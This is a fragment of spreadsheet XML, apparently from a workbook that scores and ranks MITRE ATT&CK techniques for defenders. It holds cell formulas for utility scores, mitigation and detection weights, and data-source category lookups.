      <c r="AO519" s="37">
        <v>0</v>
      </c>
      <c r="AP519" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ519" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>34.35</v>
      </c>
      <c r="AR519" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS519" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT519" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU51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20" spans="1:47" ht="34">
      <c r="A520" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B520" s="37">
        <f t="shared" si="8"/>
        <v>103.25</v>
      </c>
      <c r="C520" s="37" t="s">
        <v>1802</v>
      </c>
      <c r="D520" s="50" t="s">
        <v>1792</v>
      </c>
      <c r="E520" s="37" t="s">
        <v>1803</v>
      </c>
      <c r="F520" s="37">
        <v>0</v>
      </c>
      <c r="G520" s="37">
        <v>1</v>
      </c>
      <c r="H520" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I520" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J520" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K520" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L520" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M520" s="37">
        <v>0</v>
      </c>
      <c r="N520" s="56">
        <v>0</v>
      </c>
      <c r="O520" s="56">
        <v>0</v>
      </c>
      <c r="P520" s="56">
        <v>0</v>
      </c>
      <c r="Q520" s="56">
        <v>0</v>
      </c>
      <c r="R520" s="57"/>
      <c r="S520" s="57">
        <v>0</v>
      </c>
      <c r="T520" s="57"/>
      <c r="U520" s="57">
        <v>0</v>
      </c>
      <c r="V520" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W520" s="37">
        <v>0</v>
      </c>
      <c r="X520" s="37">
        <v>0</v>
      </c>
      <c r="Y520" s="37">
        <v>0</v>
      </c>
      <c r="Z520" s="37">
        <v>0</v>
      </c>
      <c r="AA520" s="37">
        <v>0</v>
      </c>
      <c r="AB520" s="37">
        <v>0</v>
      </c>
      <c r="AC520" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD520" s="50" t="s">
        <v>1801</v>
      </c>
      <c r="AE520" s="37" t="str" cm="1">
        <f t="array" ref="AE520">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD520)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF520" s="37">
        <v>516</v>
      </c>
      <c r="AG520" s="37" t="str" cm="1">
        <f t="array" ref="AG520">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD520)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH520" s="37">
        <v>516</v>
      </c>
      <c r="AI520" s="37" t="str" cm="1">
        <f t="array" ref="AI520">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD520)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ520" s="37">
        <v>516</v>
      </c>
      <c r="AK520" s="37" t="str" cm="1">
        <f t="array" ref="AK520">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD520)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL520" s="37">
        <v>516</v>
      </c>
      <c r="AM520" s="37" t="str" cm="1">
        <f t="array" ref="AM520">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD520)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN520" s="37">
        <v>0</v>
      </c>
      <c r="AO520" s="37">
        <v>0</v>
      </c>
      <c r="AP520" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ520" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>34.416666666666664</v>
      </c>
      <c r="AR520" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS520" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT520" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU52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21" spans="1:47" ht="17">
      <c r="A521" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B521" s="37">
        <f t="shared" si="8"/>
        <v>103.45</v>
      </c>
      <c r="C521" s="37" t="s">
        <v>1804</v>
      </c>
      <c r="D521" s="50" t="s">
        <v>1792</v>
      </c>
      <c r="E521" s="37" t="s">
        <v>1805</v>
      </c>
      <c r="F521" s="37">
        <v>0</v>
      </c>
      <c r="G521" s="37">
        <v>1</v>
      </c>
      <c r="H521" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I521" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J521" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K521" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L521" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M521" s="37">
        <v>0</v>
      </c>
      <c r="N521" s="56">
        <v>0</v>
      </c>
      <c r="O521" s="56">
        <v>0</v>
      </c>
      <c r="P521" s="56">
        <v>0</v>
      </c>
      <c r="Q521" s="56">
        <v>0</v>
      </c>
      <c r="R521" s="57"/>
      <c r="S521" s="57">
        <v>0</v>
      </c>
      <c r="T521" s="57"/>
      <c r="U521" s="57">
        <v>0</v>
      </c>
      <c r="V521" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W521" s="37">
        <v>0</v>
      </c>
      <c r="X521" s="37">
        <v>0</v>
      </c>
      <c r="Y521" s="37">
        <v>0</v>
      </c>
      <c r="Z521" s="37">
        <v>0</v>
      </c>
      <c r="AA521" s="37">
        <v>0</v>
      </c>
      <c r="AB521" s="37">
        <v>0</v>
      </c>
      <c r="AC521" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD521" s="50"/>
      <c r="AE521" s="37" t="str" cm="1">
        <f t="array" ref="AE521">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD521)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF521" s="37">
        <v>517</v>
      </c>
      <c r="AG521" s="37" t="str" cm="1">
        <f t="array" ref="AG521">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD521)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH521" s="37">
        <v>517</v>
      </c>
      <c r="AI521" s="37" t="str" cm="1">
        <f t="array" ref="AI521">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD521)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ521" s="37">
        <v>517</v>
      </c>
      <c r="AK521" s="37" t="str" cm="1">
        <f t="array" ref="AK521">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD521)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL521" s="37">
        <v>517</v>
      </c>
      <c r="AM521" s="37" t="str" cm="1">
        <f t="array" ref="AM521">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD521)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN521" s="37">
        <v>0</v>
      </c>
      <c r="AO521" s="37">
        <v>1</v>
      </c>
      <c r="AP521" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ521" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>34.483333333333334</v>
      </c>
      <c r="AR521" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS521" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT521" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU52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0.84484126984126995</v>
      </c>
    </row>
    <row r="522" spans="1:47" ht="17">
      <c r="A522" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B522" s="37">
        <f t="shared" si="8"/>
        <v>103.65</v>
      </c>
      <c r="C522" s="37" t="s">
        <v>1806</v>
      </c>
      <c r="D522" s="50" t="s">
        <v>1792</v>
      </c>
      <c r="E522" s="37" t="s">
        <v>1807</v>
      </c>
      <c r="F522" s="37">
        <v>0</v>
      </c>
      <c r="G522" s="37">
        <v>1</v>
      </c>
      <c r="H522" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I522" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J522" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K522" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L522" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M522" s="37">
        <v>0</v>
      </c>
      <c r="N522" s="56">
        <v>0</v>
      </c>
      <c r="O522" s="56">
        <v>0</v>
      </c>
      <c r="P522" s="56">
        <v>0</v>
      </c>
      <c r="Q522" s="56">
        <v>0</v>
      </c>
      <c r="R522" s="57"/>
      <c r="S522" s="57">
        <v>0</v>
      </c>
      <c r="T522" s="57"/>
      <c r="U522" s="57">
        <v>0</v>
      </c>
      <c r="V522" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W522" s="37">
        <v>0</v>
      </c>
      <c r="X522" s="37">
        <v>0</v>
      </c>
      <c r="Y522" s="37">
        <v>0</v>
      </c>
      <c r="Z522" s="37">
        <v>0</v>
      </c>
      <c r="AA522" s="37">
        <v>0</v>
      </c>
      <c r="AB522" s="37">
        <v>0</v>
      </c>
      <c r="AC522" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD522" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE522" s="37" t="str" cm="1">
        <f t="array" ref="AE522">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD522)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF522" s="37">
        <v>518</v>
      </c>
      <c r="AG522" s="37" t="str" cm="1">
        <f t="array" ref="AG522">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD522)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH522" s="37">
        <v>518</v>
      </c>
      <c r="AI522" s="37" t="str" cm="1">
        <f t="array" ref="AI522">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD522)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ522" s="37">
        <v>518</v>
      </c>
      <c r="AK522" s="37" t="str" cm="1">
        <f t="array" ref="AK522">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD522)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL522" s="37">
        <v>518</v>
      </c>
      <c r="AM522" s="37" t="str" cm="1">
        <f t="array" ref="AM522">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD522)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN522" s="37">
        <v>0</v>
      </c>
      <c r="AO522" s="37">
        <v>1</v>
      </c>
      <c r="AP522" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ522" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>34.550000000000004</v>
      </c>
      <c r="AR522" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS522" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT522" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU52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0.84642857142857153</v>
      </c>
    </row>
    <row r="523" spans="1:47" ht="17">
      <c r="A523" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B523" s="37">
        <f t="shared" si="8"/>
        <v>123.63095238095239</v>
      </c>
      <c r="C523" s="37" t="s">
        <v>1809</v>
      </c>
      <c r="D523" s="50" t="s">
        <v>1792</v>
      </c>
      <c r="E523" s="37" t="s">
        <v>1810</v>
      </c>
      <c r="F523" s="37">
        <v>0</v>
      </c>
      <c r="G523" s="37">
        <v>1</v>
      </c>
      <c r="H523" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I523" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J523" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K523" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L523" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M523" s="37">
        <v>0</v>
      </c>
      <c r="N523" s="56">
        <v>0</v>
      </c>
      <c r="O523" s="56">
        <v>2</v>
      </c>
      <c r="P523" s="56">
        <v>0</v>
      </c>
      <c r="Q523" s="56">
        <v>0</v>
      </c>
      <c r="R523" s="57"/>
      <c r="S523" s="57"/>
      <c r="T523" s="57"/>
      <c r="U523" s="57"/>
      <c r="V523" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>9.5238095238095229E-3</v>
      </c>
      <c r="W523" s="37">
        <v>0</v>
      </c>
      <c r="X523" s="37">
        <v>0</v>
      </c>
      <c r="Y523" s="37">
        <v>0</v>
      </c>
      <c r="Z523" s="37">
        <v>2</v>
      </c>
      <c r="AA523" s="37">
        <v>0.02</v>
      </c>
      <c r="AB523" s="37">
        <v>0.02</v>
      </c>
      <c r="AC523" s="37" t="s">
        <v>127</v>
      </c>
      <c r="AD523" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE523" s="37" t="str" cm="1">
        <f t="array" ref="AE523">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD523)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF523" s="37">
        <v>519</v>
      </c>
      <c r="AG523" s="37" t="str" cm="1">
        <f t="array" ref="AG523">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD523)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH523" s="37">
        <v>519</v>
      </c>
      <c r="AI523" s="37" t="str" cm="1">
        <f t="array" ref="AI523">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD523)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ523" s="37">
        <v>519</v>
      </c>
      <c r="AK523" s="37" t="str" cm="1">
        <f t="array" ref="AK523">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD523)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL523" s="37">
        <v>519</v>
      </c>
      <c r="AM523" s="37" t="str" cm="1">
        <f t="array" ref="AM523">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD523)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN523" s="37">
        <v>0</v>
      </c>
      <c r="AO523" s="37"/>
      <c r="AP523" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ523" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>41.210317460317462</v>
      </c>
      <c r="AR523" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS523" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT523" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU52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24" spans="1:47" ht="17">
      <c r="A524" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B524" s="37">
        <f t="shared" si="8"/>
        <v>208.10000000000002</v>
      </c>
      <c r="C524" s="37" t="s">
        <v>3819</v>
      </c>
      <c r="D524" s="50" t="s">
        <v>1792</v>
      </c>
      <c r="E524" s="37" t="s">
        <v>3820</v>
      </c>
      <c r="F524" s="37">
        <v>1</v>
      </c>
      <c r="G524" s="37">
        <v>1</v>
      </c>
      <c r="H524" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I524" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J524" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K524" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L524" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M524" s="37">
        <v>0</v>
      </c>
      <c r="N524" s="56">
        <v>0</v>
      </c>
      <c r="O524" s="56">
        <v>0</v>
      </c>
      <c r="P524" s="56">
        <v>0</v>
      </c>
      <c r="Q524" s="56">
        <v>0</v>
      </c>
      <c r="R524" s="57"/>
      <c r="S524" s="57"/>
      <c r="T524" s="57"/>
      <c r="U524" s="57"/>
      <c r="V524" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W524" s="37"/>
      <c r="X524" s="37"/>
      <c r="Y524" s="37"/>
      <c r="Z524" s="37"/>
      <c r="AA524" s="37"/>
      <c r="AB524" s="37"/>
      <c r="AC524" s="37"/>
      <c r="AD524" s="50" t="s">
        <v>1808</v>
      </c>
      <c r="AE524" s="37" t="str" cm="1">
        <f t="array" ref="AE524">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD524)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF524" s="37">
        <v>520</v>
      </c>
      <c r="AG524" s="37" t="str" cm="1">
        <f t="array" ref="AG524">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD524)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH524" s="37">
        <v>520</v>
      </c>
      <c r="AI524" s="37" t="str" cm="1">
        <f t="array" ref="AI524">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD524)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ524" s="37">
        <v>520</v>
      </c>
      <c r="AK524" s="37" t="str" cm="1">
        <f t="array" ref="AK524">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD524)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL524" s="37">
        <v>520</v>
      </c>
      <c r="AM524" s="37" t="str" cm="1">
        <f t="array" ref="AM524">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD524)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN524" s="37"/>
      <c r="AO524" s="37"/>
      <c r="AP524" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ524" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>69.366666666666674</v>
      </c>
      <c r="AR524" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS524" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT524" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU52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25" spans="1:47" ht="51">
      <c r="A525" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B525" s="37">
        <f t="shared" si="8"/>
        <v>112.62961500000002</v>
      </c>
      <c r="C525" s="37" t="s">
        <v>1811</v>
      </c>
      <c r="D525" s="50" t="s">
        <v>1812</v>
      </c>
      <c r="E525" s="37"/>
      <c r="F525" s="37">
        <v>0</v>
      </c>
      <c r="G525" s="37">
        <v>1</v>
      </c>
      <c r="H525" s="37">
